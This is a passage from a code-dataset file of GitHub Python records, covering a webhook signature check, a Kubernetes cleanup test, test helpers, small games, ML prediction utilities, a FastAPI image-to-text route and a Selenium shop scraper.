needs to be verified\n \"\"\"\n key = ensure_text(key, \"key\")\n signature = ensure_text(signature, \"signature\")\n body = ensure_text(body, \"body\")\n\n if key != self.key:\n return None\n\n if not verify(self.secret, body, signature):\n return None\n\n try:\n body_data = json.loads(body, cls=self._json_decoder)\n\n except ValueError:\n return None\n\n time_ms = body_data.get('time_ms')\n if not time_ms:\n return None\n\n if abs(time.time()*1000 - time_ms) > 300000:\n return None\n\n return body_data\n","repo_name":"pusher/pusher-http-python","sub_path":"pusher/authentication_client.py","file_name":"authentication_client.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"en","doc_type":"code","stars":370,"dataset":"github-code","pt":"48"} +{"seq_id":"23582499561","text":"#!/usr/bin/env python\n\n\nimport os\nimport subprocess\nimport sys\nimport time\n\nimport kubernetes\n# 3rd party deps\nfrom kubernetes import client, config\nfrom kubernetes.client.rest import ApiException\n\n# constants\nTEST_NAMESPACE = 'test-pod-cleaner'\nTEST_IMAGE = 'nginx'\n\n\ndef create_pod(api, name, namespace, image, cmd):\n pod = client.V1Pod(\n metadata=client.V1ObjectMeta(name=name),\n spec=client.V1PodSpec(\n containers=[\n client.V1Container(\n name=name,\n image=image,\n command=cmd)]))\n\n return api.create_namespaced_pod(namespace=namespace, body=pod)\n\n\ndef create_pods(api, namespace, image):\n create_pod(api, 'test-completed', namespace, image, ['nginx'])\n create_pod(api, 'test-running', namespace,\n image, ['nginx', '-g', 'daemon off;'])\n create_pod(api, 'test-crashloop', namespace, image, ['exit 1'])\n create_pod(api, 'test-can-not-run', namespace, image, ['foo'])\n\n while True:\n pod = api.read_namespaced_pod(name='test-running', namespace=namespace)\n print(\n f\"Waiting for pod {pod.metadata.name} to be running: {pod.status.phase}\")\n if pod.status.phase == 'Running':\n break\n time.sleep(1)\n\n\ndef create_namespace(api, name):\n namespace = client.V1Namespace()\n namespace.metadata = client.V1ObjectMeta(name=name)\n api.create_namespace(body=namespace)\n\n while True:\n namespace = api.read_namespace(name=name)\n print(\n f\"Waiting for namespace {name} to be created, status: {namespace.status.phase}\")\n if namespace.status.phase == 'Active':\n return namespace\n time.sleep(1)\n\n\ndef delete_namespace(api, name):\n return api.delete_namespace(name=name)\n\n\ndef namespace_name(name):\n return f\"{name}-{int(time.time())}\"\n\n\ndef run_cleanup():\n return subprocess.run(\n [sys.executable, 'cleanup.py', '--verbose', '--debug'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n text=True)\n\n\ndef ask_and_exit(exit_code=0):\n if os.getenv('CI') == 'true':\n sys.exit(exit_code)\n\n prompt = input(f\"Clean up namespace {namespace}? [y/N] \")\n if prompt.lower() == 'y':\n print(\"Deleting namespace\")\n delete_namespace(api, namespace)\n\n sys.exit(exit_code)\n\n\nif __name__ == '__main__':\n print(\"loading kube config\")\n try:\n config.load_incluster_config()\n except kubernetes.config.config_exception.ConfigException:\n try:\n config.load_kube_config()\n except kubernetes.config.config_exception.ConfigException as e2:\n raise e2\n\n api = client.CoreV1Api()\n namespace = namespace_name(TEST_NAMESPACE)\n\n print(f\"Creating namespace: {namespace}\")\n create_namespace(api, namespace)\n\n print(\"Creating pods\")\n create_pods(api, namespace, TEST_IMAGE)\n\n print(\"Waiting for good luck\")\n time.sleep(30)\n\n print(\"Starting cleanup.py\")\n cleanup = run_cleanup()\n\n print(cleanup.stdout)\n print(cleanup.stderr)\n\n if cleanup.returncode != 0:\n print(\"cleanup.py failed\")\n ask_and_exit(1)\n\n print(\"Waiting 30s for pods to be removed from API-server...\")\n time.sleep(60)\n\n print(\"Checking remaining pods\")\n pods = api.list_namespaced_pod(namespace=namespace).items\n for pod in pods:\n if pod.metadata.name in ('test-can-not-run', 'test-crashloop'):\n print(f\"Pod {pod.metadata.name} was not deleted\")\n print(pod)\n ask_and_exit(1)\n\n ask_and_exit(0)\n","repo_name":"nais/pod-cleaner","sub_path":"cleanup_e2e.py","file_name":"cleanup_e2e.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4517882999","text":"from __future__ import annotations\n\nimport inspect\nimport sys\nfrom functools import wraps\nfrom types import FunctionType\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Sequence\nfrom typing import TypeVar\nfrom unittest import TestCase\n\nif sys.version_info >= (3, 10):\n from typing import ParamSpec\nelse:\n from typing_extensions import ParamSpec\n\n\nclass ParametrizedTestCase(TestCase):\n @classmethod\n def __init_subclass__(cls, **kwargs: Any) -> None:\n super().__init_subclass__(**kwargs)\n\n for name, func in list(cls.__dict__.items()):\n if not isinstance(func, FunctionType):\n continue\n if not hasattr(func, \"_parametrized\"):\n continue\n\n if hasattr(func, \"__wrapped__\") and hasattr(\n func.__wrapped__, \"_parametrized\"\n ):\n raise TypeError(\n \"@parametrize must be the top-most decorator on \"\n + func.__qualname__\n )\n\n _parametrized = func._parametrized # type: ignore [attr-defined]\n delattr(cls, name)\n for param in _parametrized.params:\n params = dict(zip(_parametrized.argnames, param.args))\n\n @wraps(func)\n def test(\n self: TestCase,\n *args: Any,\n _func: FunctionType = func,\n _params: dict[str, Any] = params,\n **kwargs: Any,\n ) -> Any:\n return _func(self, *args, **_params, **kwargs)\n\n test.__name__ = f\"{name}_{param.id}\"\n test.__qualname__ = f\"{test.__qualname__}_{param.id}\"\n\n if hasattr(cls, test.__name__):\n raise ValueError(\n f\"Duplicate test name {test.__name__} in {cls.__name__}\"\n )\n\n setattr(cls, test.__name__, test)\n\n\nclass param:\n __slots__ = (\"args\", \"id\")\n\n def __init__(self, *args: Any, id: str | None = None) -> None:\n self.args = args\n\n if id is not None and not f\"_{id}\".isidentifier():\n raise ValueError(f\"id must be a valid Python identifier suffix: {id!r}\")\n\n self.id = id\n\n\nclass parametrized:\n __slots__ = (\"argnames\", \"params\")\n\n def __init__(self, argnames: Sequence[str], params: Sequence[param]) -> None:\n self.argnames = argnames\n self.params = params\n\n\nP = ParamSpec(\"P\")\nT = TypeVar(\"T\")\nTestFunc = Callable[P, T]\n\n\ndef parametrize(\n argnames: str | Sequence[str],\n argvalues: Sequence[tuple[Any, ...]] | Sequence[param],\n ids: Sequence[str | None] | None = None,\n) -> Callable[[Callable[P, T]], Callable[P, T]]:\n if isinstance(argnames, str):\n argnames = argnames.split(\",\")\n\n if len(argnames) == 0:\n raise ValueError(\"argnames must contain at least one element\")\n\n if ids is not None and len(ids) != len(argvalues):\n raise ValueError(\"ids must have the same length as argvalues\")\n\n seen_ids = set()\n params = []\n for i, argvalue in enumerate(argvalues):\n if ids and ids[i]:\n id_ = ids[i]\n else:\n id_ = str(i)\n\n if isinstance(argvalue, tuple):\n if len(argvalue) != len(argnames):\n raise ValueError(\n f\"tuple at index {i} has wrong number of arguments \"\n + f\"({len(argvalue)} != {len(argnames)})\"\n )\n params.append(param(*argvalue, id=id_))\n elif isinstance(argvalue, param):\n if len(argvalue.args) != len(argnames):\n raise ValueError(\n f\"param at index {i} has wrong number of arguments \"\n + f\"({len(argvalue.args)} != {len(argnames)})\"\n )\n\n if argvalue.id is None:\n argvalue = param(*argvalue.args, id=id_)\n if argvalue.id in seen_ids:\n raise ValueError(f\"Duplicate param id {argvalue.id!r}\")\n seen_ids.add(argvalue.id)\n params.append(argvalue)\n\n else:\n raise TypeError(\n f\"argvalue at index {i} is not a tuple or param instance: {argvalue!r}\"\n )\n\n _parametrized = parametrized(argnames, params)\n bind_kwargs = {k: None for k in _parametrized.argnames}\n\n def wrapper(func: Callable[P, T]) -> Callable[P, T]:\n # Check given argnames will work\n sig = inspect.signature(func)\n sig.bind_partial(**bind_kwargs)\n\n if hasattr(func, \"_parametrized\"):\n raise TypeError(f\"@parametrize cannot be stacked on {func.__qualname__}\")\n\n func._parametrized = _parametrized # type: ignore [attr-defined]\n return func\n\n return wrapper\n","repo_name":"adamchainz/unittest-parametrize","sub_path":"src/unittest_parametrize/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4797,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"48"} +{"seq_id":"38842931353","text":"import logging\nimport os\nfrom logging.handlers import TimedRotatingFileHandler\n\nFORMATTER = logging.Formatter(\"%(asctime)s — %(name)s — %(levelname)s — %(message)s\")\nLOG_FILE = os.path.abspath(\"\") + \"\\\\logs\\\\log.log\"\n\n\ndef get_file_handler():\n file_handler = TimedRotatingFileHandler(LOG_FILE)\n file_handler.setFormatter(FORMATTER)\n return file_handler\n\n\ndef get_logger(logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n logger.addHandler(get_file_handler())\n logger.info(\"Logger is set up\")\n return logger\n\n\nLOGGER = get_logger(\"test\")\n","repo_name":"alex142/python_selenium_start","sub_path":"helpers/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11413098270","text":"from api.OrderHandlerTester import OrderHandler\n\n\ndef add_order(requester_id, bu, order_type, description):\n order = OrderHandler()\n orderno = order.add_order(requester_id, bu, order_type, description)\n return 'Order ' + orderno + ' has been added'\n\n\ndef get_order_status(id) -> str:\n order = OrderHandler()\n status = order.get_order_status(id)\n if len(status) > 0:\n return 'Order {id} has the status: {status}'.format(id=id, status=status) # noqa\n else:\n return 'The specified order id is invalid'\n\n\ndef get_order_details(id) -> str:\n order = OrderHandler()\n info = order.get_order_details(id)\n if len(info) > 0:\n return 'Order {id} infos: {info}'.format(id=id, info=info)\n else:\n return 'The specified order id is invalid'\n","repo_name":"baloise/oim-api","sub_path":"apiserver/api/calls_order.py","file_name":"calls_order.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29051143130","text":"#!/usr/bin/python3\ndef list_division(my_list_1, my_list_2, list_length):\n new_list = []\n i = 0\n try:\n while i < list_length:\n try:\n elem = my_list_1[i] / my_list_2[i]\n new_list.append(elem)\n i += 1\n except ZeroDivisionError:\n print(\"division by 0\")\n new_list.append(0)\n i += 1\n except (ValueError, TypeError):\n print(\"wrong type\")\n new_list.append(0)\n i += 1\n except IndexError:\n print(\"out of range\")\n new_list.append(0)\n break\n finally:\n return new_list\n","repo_name":"geraldrolland/alx-higher_level_programming","sub_path":"0x05-python-exceptions/4-list_division.py","file_name":"4-list_division.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72000814227","text":"import random\r\nimport os\r\nimport sys\r\n\r\n\r\ncards = {\"A\": 11, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10, \"J\": 10, \"Q\": 10, \"K\": 10}\r\n\r\n\r\ndef house_rules():\r\n read_rules = input(\"Would you like to read the House Rules? Type 'y' or 'n': \").lower()\r\n while read_rules not in ['y', 'n']:\r\n read_rules = input(\"Please type either 'y' or 'n': \").lower()\r\n if read_rules == 'y':\r\n rules = \"\\n*** Blackjack House Rules ***\\n\\nThe deck is unlimited in size\\nJacks, Queens, and Kings all count \"\\\r\n \"as 10 points\\nAces can count as 11 or 1 depending on your hand value\\nThe rest of the cards are \" \\\r\n \"worth their face value.\\nThere are no Jokers\\nAll cards have an equal probability of being drawn\\n\" \\\r\n \"Cards are not removed from the deck as they are drawn\\nThe computer is the dealer\\nIf either the \" \\\r\n \"player or the dealer exceed 21 points, it is an automatic loss\\nTry to get as close as you can to \" \\\r\n \"21 points without going over in order to win\"\r\n return rules\r\n else:\r\n return \"\"\r\n\r\n\r\ndef deal_card(hand, score):\r\n \"\"\"\r\n Function chooses a random card, value pair from `cards` dictionary and adds it to the specified hand.\r\n :param hand: the list to append the card to\r\n :param score: the score that the card value gets added to\r\n :return: returns revised hand and score of that hand\r\n \"\"\"\r\n card, value = random.choice(list(cards.items()))\r\n hand.append(card)\r\n score += value\r\n return hand, score\r\n\r\n\r\ndef is_blackjack(p_score, d_score):\r\n \"\"\"\r\n Function checks to see if blackjack (21) points has been achieved. Dealer has precedence in blackjack.\r\n If both dealer and player have blackjack, dealer still wins.\r\n :param p_score: player score\r\n :param d_score: dealer score\r\n :return: Message if blackjack has been achieved (distinct messages for player and dealer,\r\n and an empty string if blackjack has not been achieved\r\n \"\"\"\r\n if d_score == 21:\r\n check = \"d-blackjack\"\r\n elif p_score == 21:\r\n check = \"p-blackjack\"\r\n else:\r\n check = \"\"\r\n return check\r\n\r\n\r\ndef convert_ace(hand, score, ace_counter):\r\n \"\"\"\r\n Function checks to see if a hand is over 21 and has an \"A\" card. If both conditions are true, the\r\n value of the \"A\" card is decreased from 11 to 1.\r\n :param hand: the hand to check for \"A\"\r\n :param score: the score to check if over 21\r\n :param ace_counter: checks to see if aces have already been converted before adjusting score\r\n :return: adjusted score, adjusted ace_counter\r\n \"\"\"\r\n if \"A\" in hand and score > 21 and hand.count(\"A\") > ace_counter:\r\n score -= 10\r\n ace_counter += 1\r\n return score, ace_counter\r\n\r\n\r\ndef instant_loss(hand_owner, hand, score):\r\n \"\"\"\r\n Function evaluates is a particular hand has exceeded 21, thus causing an instant loss\r\n :param hand_owner: the owner of the hand (either dealer or player)\r\n :param hand: cards\r\n :param score: card scores\r\n :return: the message generated by the if statement\r\n \"\"\"\r\n if score > 21 and hand_owner == \"player\":\r\n message = f\"\\nYour hand is {hand}, current score is {score}\\nYou've exceeded 21 points\\n\\nYOU LOSE!\"\r\n elif score > 21 and hand_owner == \"dealer\":\r\n message = f\"\\nComputer's hand is {hand}, current score is {score}\\nComputer has exceeded 21 points\\n\\nYOU WIN!\"\r\n else:\r\n message = \"continue\"\r\n return message\r\n\r\n\r\ndef calculate_winner(player_hand, player_score, dealer_hand, dealer_score):\r\n \"\"\"\r\n Function weighs player score vs. dealer scores and determines whether player has won, lost,\r\n or if game is a draw\r\n :param player_hand: player hand\r\n :param player_score: player score value\r\n :param dealer_hand: dealer hand\r\n :param dealer_score: dealer score value\r\n :return: message corresponding to player win, player loss,or tie\r\n \"\"\"\r\n if player_score == dealer_score:\r\n message = f\"Your hand {player_hand}, current score: {player_score}\\nComputer's hand {dealer_hand}, current score: {dealer_score}\\nIt's a tie!\\n\\nGAME ENDS IN A DRAW!\"\r\n elif dealer_score > player_score:\r\n message = f\"Your hand {player_hand}, current score: {player_score}\\nComputer's hand {dealer_hand}, current score: {dealer_score}\\nComputer wins with {dealer_score}!\\n\\nYOU LOSE!\"\r\n else:\r\n message = f\"Your hand {player_hand}, current score: {player_score}\\nComputer's hand {dealer_hand}, current score: {dealer_score}\\nYou win with a score of {player_score}!\\n\\nYOU'RE THE WINNER!\"\r\n return message\r\n\r\n\r\ndef clear():\r\n \"\"\"\r\n Clears console\r\n \"\"\"\r\n os.system('cls')\r\n\r\n\r\ndef yes_or_no():\r\n \"\"\"\r\n Asks player if they would like another card; will not accept values other than 'y' or 'n'\r\n :return: returns player answer (either 'y' or 'n')\r\n \"\"\"\r\n answer = input(\"Would you like another card? Type 'y' or 'n': \").lower()\r\n while answer != 'y' and answer != 'n':\r\n answer = input(\"Please enter either 'y' or 'n': \").lower()\r\n return answer\r\n\r\n\r\ndef replay():\r\n \"\"\"\r\n Asks player if they would like to play again; only accepts valid answers\r\n :return: closes program if player does not want to play again\r\n \"\"\"\r\n another_round = input(\"\\nWould you like to play again? Type 'y' or 'n': \").lower()\r\n while another_round != 'y' and another_round != 'n':\r\n another_round = input(\"Please pick either 'y' or 'n': \").lower()\r\n\r\n if another_round == 'n':\r\n return sys.exit(\"Thank you for playing!\")\r\n else:\r\n return\r\n","repo_name":"MaryanneR/Simple-Python-Games","sub_path":"blackjack_game/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18500500454","text":"import json\nfrom flask import Flask, request, jsonify\nimport pandas as pd\nimport pickle\nimport numpy as np\n__locations = None\n__data_columns = None\n__model = None\n\n\ndef get_estimated_price(bedrooms, parking_space, house_type):\n try:\n # Convert house_type to lowercase\n house_type = house_type\n\n # Create a DataFrame with the input data\n df = pd.DataFrame({\n \"bedrooms\": [bedrooms],\n \"parking_space\": [parking_space],\n \"house_type\": [house_type]\n })\n\n # Perform one-hot encoding on the 'house_type' column\n df_encoded = pd.get_dummies(df)\n\n try:\n # Load the trained model\n with open('artifacts/lekki_home_prices_model.pickle', 'rb') as file:\n model = pickle.load(file)\n\n # Load the X_train dataframe\n with open('artifacts/x_train.pickle', 'rb') as file:\n X_train = pickle.load(file)\n\n # Get the column names from the training data used for the model\n model_columns = X_train.columns.to_list()\n\n # Ensure the encoded dataframe has the same columns as the training data\n df_encoded = df_encoded.reindex(columns=model_columns, fill_value=0)\n\n # Make the prediction using the loaded model\n prediction = model.predict(df_encoded).round(2)[0]\n\n formatted_prediction = \"₦{:,}\".format(prediction)\n # Prepare the response\n response = {\n \"prediction\": formatted_prediction\n }\n\n return (response)\n\n except FileNotFoundError:\n error_response = {\n \"error\": \"Model or X_train pickle file not found\"\n }\n return jsonify(error_response), 500\n\n except KeyError:\n error_response = {\n \"error\": \"Invalid input format\"\n }\n return jsonify(error_response), 400\n\ndef get_location_names():\n return __locations\n\n\ndef load_saved_artifects():\n print(\"loading saved artifacts .. start\")\n global __data_columns\n global __locations\n\n with open(\"./artifacts/columnsX_train.json\",'r') as f:\n __data_columns = json.load(f)['data_columns']\n __locations = __data_columns[2:]\n\n global __model\n\n with open(\"./artifacts/lekki_home_prices_model.pickle\",\"rb\") as f:\n __model = pickle.load(f)\n\n print(\"loading saved artifects..done\")\nif __name__ == '__main__':\n load_saved_artifects()\n print(get_location_names())\n print(get_estimated_price(4, 3, \"Block of Flats\"))\n print(get_estimated_price(4, 3, \"Detached Duplex\"))\n print(get_estimated_price(4, 3, \"Semi Detached Duplex\"))\n print(get_estimated_price(4, 1, \"Block of Flats\"))\n\n","repo_name":"saaga23/Lekki-house-price-pridiction","sub_path":"server/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71204525586","text":"import logging\nfrom http import HTTPStatus\nfrom io import BytesIO\n\nimport PIL\nfrom PIL import Image\nfrom fastapi import APIRouter, File, UploadFile, HTTPException, Form\nfrom starlette.responses import PlainTextResponse, Response\n\nfrom text_to_image import TextImage, ImageFormat\n\nimage_to_text_router = APIRouter()\nlogger = logging.getLogger(__name__)\n\n\ndef get_image_format(file: UploadFile, user_provided_extension: str | None) -> ImageFormat:\n if user_provided_extension:\n extension = user_provided_extension\n else:\n extension = file.content_type.split('/')[-1]\n\n try:\n return ImageFormat.parse(extension)\n except ValueError as value_error:\n logger.warning('Could not get ImageFormat from provided extension', exc_info=value_error)\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail='Requested image extension is not supported'\n )\n\n\ndef get_text_image(content: bytes, image_format: ImageFormat) -> TextImage:\n with BytesIO(content) as io:\n try:\n image = Image.open(io, mode='r', formats=(image_format,))\n except PIL.UnidentifiedImageError as unidentified_error:\n logger.warning('Error during file decode', exc_info=unidentified_error)\n raise HTTPException(\n status_code=HTTPStatus.UNPROCESSABLE_ENTITY,\n detail='Could not open image in specified format'\n )\n\n encoded_text = bytes(\n byte\n for pixel in image.getdata()\n for byte in pixel\n ).rstrip(b'\\0')\n\n return TextImage(encoded_text)\n\n\n@image_to_text_router.post(\"/api/image/to/text\", response_class=PlainTextResponse)\nasync def post__image_to_text(\n file: UploadFile = File(),\n image_extension: str = Form(default=None,\n alias='imageFormat')) -> Response:\n image_format = get_image_format(file, image_extension)\n file_bytes = await read_upload_file(file)\n text_image = get_text_image(file_bytes, image_format)\n text = decode_text(text_image)\n return PlainTextResponse(\n text,\n status_code=HTTPStatus.OK,\n media_type=\"text/plain\"\n )\n\n\ndef decode_text(image: TextImage) -> str:\n try:\n text = image.text\n except (ValueError, UnicodeDecodeError) as error:\n logger.warning('Error during converting image',\n exc_info=error)\n raise HTTPException(\n status_code=HTTPStatus.UNPROCESSABLE_ENTITY,\n detail=\"Could not convert given image to text\",\n )\n return text\n\n\nasync def read_upload_file(file: UploadFile) -> bytes:\n file_bytes = await file.read()\n if not len(file_bytes):\n raise HTTPException(\n status_code=HTTPStatus.BAD_REQUEST,\n detail='Provided image file is empty'\n )\n return file_bytes\n","repo_name":"ashenBlade/text-2-image","sub_path":"src/backend/web/routers/image_to_text.py","file_name":"image_to_text.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31543433511","text":"from sklearn.externals import joblib\nimport sys\nimport numpy as np\nimport os,sys,inspect\ncurrentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nparentdir = os.path.dirname(currentdir)\nsys.path.insert(0,parentdir)\nimport models.baseline as bs\nimport models.baseline.utils.score as sc\nimport models.baseline.feature_engineering as fe\n\n\nPATH = 'features/'\nif not os.path.exists(PATH):\n os.makedirs(PATH)\n\ndef load_classifier(path):\n clf = joblib.load(path)\n return clf\n\ndef load_text(path):\n text = np.loadtxt(path)\n print(text)\n\ndef make_prediction(stance, body, clf):\n \"\"\" stance - str 'headline'\n body - str 'article'\n \"\"\"\n h = [stance]\n b = [body]\n X = fit_features(h,b)\n\n print(clf.predict_proba(X))\n predicted = sc.LABELS[int(clf.predict(X))]\n\n print(predicted)\n\ndef fit_features(h, b, name='test'):\n\n X_overlap = fe.gen_or_load_feats(fe.word_overlap_features, h, b, PATH + \"overlap.\"+name+\".npy\")\n X_refuting = fe.gen_or_load_feats(fe.refuting_features, h, b, PATH + \"refuting.\"+name+\".npy\")\n X_polarity = fe.gen_or_load_feats(fe.polarity_features, h, b, PATH + \"polarity.\"+name+\".npy\")\n X_hand = fe.gen_or_load_feats(fe.hand_features, h, b, PATH + \"hand.\"+name+\".npy\")\n\n X = np.c_[X_hand, X_polarity, X_refuting, X_overlap]\n return X\n\nif __name__=='__main__':\n clf = load_classifier(sys.argv[1])\n #load_text(sys.argv[1])\n\n with open('article1.txt') as f:\n text = f.read()\n stance = \"Woman detained in Lebanon is not al-Baghdadi's wife, Iraq says\"\n make_prediction(stance,text, clf)\n","repo_name":"hanveiga/checkyouout","sub_path":"tests/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41760088402","text":"import time\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import *\nfrom bs4 import BeautifulSoup\nimport selenium.common.exceptions\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom bs4 import BeautifulSoup\nurls_phone=[]\nwait_long=5\nwait_mean=3\nurl_main=\"https://www.dns-shop.ru\"\nurl_group=\"https://www.dns-shop.ru/catalog/17a8a01d16404e77/smartfony/\"\ndef init_driver():\n ff = \"../../install/chromedriver\"\n chrome_option = webdriver.ChromeOptions()\n prefs = {\"profile.managed_default_content_settings.images\": 2}\n chrome_option.add_experimental_option(\"prefs\", prefs)\n\n driver = webdriver.Chrome(executable_path=ff,chrome_options=chrome_option)\n #driver = webdriver.Chrome(executable_path=ff)\n driver.wait = WebDriverWait(driver,0)\n return driver\n\ndef parsing():\n print(\"Парсинг страницы\")\n # url = driver.get(url_group)\n # url = driver.get(\"https://www.dns-shop.ru/catalog/17a8a01d16404e77/smartfony/?p=10&i=1\")\n\n catalog_items_list = driver.find_element_by_class_name(\"catalog-items-list\")\n items = catalog_items_list.find_elements_by_class_name(\"item\")\n for item in items:\n webdriver.ActionChains(driver).move_to_element(item).perform();\n try:\n accessibility = item.find_element_by_class_name(\"pseudo-link\")\n except NoSuchElementException:\n accessibility=None\n if(accessibility!=None):\n if (accessibility.text.find(\"магаз\") != -1):\n print(\"Парсинг данных\")\n title = item.find_element_by_tag_name(\"h3\").text\n index_smatrphone = title.find(\"Смартфон\")\n # 9 - это длина слова 'Смартфон ' + пробел\n index_GB = title.find(\"ГБ\")\n text = title[index_smatrphone + 9:]\n opa = title[index_smatrphone + 9:index_GB - 1]\n index_space = opa.rfind(\" \")\n name = text[:index_space]\n print(\"Название телефона:\", name)\n color = title[index_GB + 3:]\n print(\"Цвет:\", color)\n variant = title[len(name) + index_smatrphone + 10:index_GB + 2]\n print(\"Разновидность:\", variant)\n\n\n price = item.find_element_by_xpath(\"*//span[@data-of='price-total' and @data-product-param='price']\").get_attribute(\"data-value\")\n print(\"цена\", price)\n\n div_title = item.find_element_by_class_name(\"title\")\n link = div_title.find_element_by_tag_name(\"a\").get_attribute(\"href\")\n print(\"Ссылка\", link)\n try:\n previous_price_s = item.find_element_by_class_name('prev-price-total')\n except (NoSuchElementException):\n previous_price_s = None\n if (previous_price_s != None):\n previous_price_s = previous_price_s.text\n previous_price = previous_price_s.replace(\" \", \"\")\n print(\"Предыдущая цена:\", previous_price)\n discount = item.find_element_by_xpath(\"*//span[@class='percent']\").text[-2:-1]\n print(\"Скидка:\", discount)\n id_accessibility=accessibility.get_attribute('data-product-id')\n print(id_accessibility)\n accessibility.click()\n shop_flters_id=\"shop-filters-list-\"+id_accessibility\n window_div_text=\"avails-modal-\"+id_accessibility\n print(shop_flters_id)\n div_shop_filters_list=WebDriverWait(driver, 30).until(EC.visibility_of_element_located((By.ID, shop_flters_id)))\n window = WebDriverWait(driver, 15).until(EC.visibility_of_element_located((By.ID, window_div_text)))\n div_avails_list_shown=window.find_element_by_class_name(\"avails-list\")\n shops = div_avails_list_shown.find_elements_by_xpath(\"*//div[(@class='avails-item row' or @class='avails-item row ') and @data-is-avail='1']\")\n\n print(\" ---------------Количество----\",len(shops))\n if(len(shops)==0):\n time.sleep(1000)\n for shop in shops:\n shop_latitude = shop.get_attribute('data-latitude')\n shop_longitude = shop.get_attribute('data-longitude')\n shop_name_text = shop.find_element_by_class_name('shop-name')\n shop_name = shop_name_text.find_element_by_tag_name('a').text\n shop_address = shop_name_text.find_elements_by_tag_name('p')[1].text\n count_phone_text = shop.find_element_by_xpath(\"div[contains(@class,'col col-3 available')]\").text\n count_phone = re.findall('(\\d+)', count_phone_text)\n print(shop_name, shop_address, shop_latitude, shop_longitude,count_phone)\n btn_close = window.find_element_by_class_name(\"modal-close-btn\")\n btn_close.click()\n WebDriverWait(driver, 15).until(EC.invisibility_of_element_located((By.ID, window_div_text)))\n # WebDriverWait(driver, 15).until(EC.invisibility_of_element_located(window))\n #time.sleep(1)\n\n\n\ndef scrolling_object(object):\n webdriver.ActionChains(driver).move_to_element(object).perform();\n\ndef lookup_main_url(driver):\n select_category(driver)\n parsing()\n\n\n\ndef select_category(driver):\n driver.get(url_group)\n #\nif __name__ == \"__main__\":\n start_time=time.time()\n driver = init_driver()\n lookup_main_url(driver)\n\n print(time.time()-start_time)\n driver.quit()\n\n\n\n","repo_name":"danilshik/Parsers","sub_path":"dns.ru/dns.py","file_name":"dns.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1401878522","text":"from src.Exceptions.PublisherExceptions import InsertException, DeleteException\nfrom src.util.Constants import Constants\nfrom src.repository import Connection\nfrom src.model.Publisher import Publisher\n\n\nclass PublisherRepository:\n\n def get_all(self):\n cursor = Connection.open()\n try:\n cursor.execute(f'SELECT * FROM {Constants.Publisher.TABLE}')\n publishers = []\n for x in cursor.fetchall():\n publisher = Publisher(\n x[Constants.Publisher.ID],\n x[Constants.Publisher.NAME],\n )\n publishers.append(publisher)\n return publishers\n finally:\n Connection.close()\n\n def insert(self, publisher):\n cursor = Connection.open()\n try:\n cursor.execute(f'''\n INSERT INTO {Constants.Publisher.TABLE}(\n {Constants.Publisher.NAME}\n ) VALUES (\"{publisher.name}\")''')\n except Exception as e:\n raise InsertException\n finally:\n cursor.close()\n Connection.close()\n\n def delete(self, id):\n cursor = Connection.open()\n try:\n cursor.execute(f'DELETE FROM {Constants.Publisher.TABLE} WHERE {Constants.Publisher.ID} = {id}')\n except Exception as e:\n raise DeleteException\n finally:\n cursor.close()\n Connection.close()\n","repo_name":"Rasipe/apocrypha-api","sub_path":"src/repository/PublisherRepository.py","file_name":"PublisherRepository.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14655928159","text":"import numpy as np\nimport datetime\nimport csv\n\n\n#=================== Object docotr ============================\n# dr_level: 0 - pgy1\n#\t\t\t1 - pgy2\n#\t\t\t2 - r1\n#\t\t\t3 - r2\n#\t\t\t4 - r3\n#\t\t\t5 - r4\n# \t\t\t6 - r5\n#\t\t\t7 - r6\n\n# =========== now don't use the dr-level ==> change to use remaining points =====\nclass Doctor :\n\tdef __init__(self, dr_id, point, special_rule):\n\t\tself.point = point\n\t\tself.id = dr_id\n\n#special rule is for doctors only allowed in some areas\t\t\n\t\tself.special_rule = special_rule\n\n\n#\tpoint = 5;\n\tdef get_point(self):\n\t\treturn self.point\n\n\tdef get_id(self):\n\t\treturn self.id\n\n\n\n#==============================================================\n\n\n#=================== Object WorkingDay ========================\nclass WorkingDay :\n\tdef __init__(self, date):\n\t\tif( date.weekday() > 4): #Monday is 0\n\t\t\tself.count = 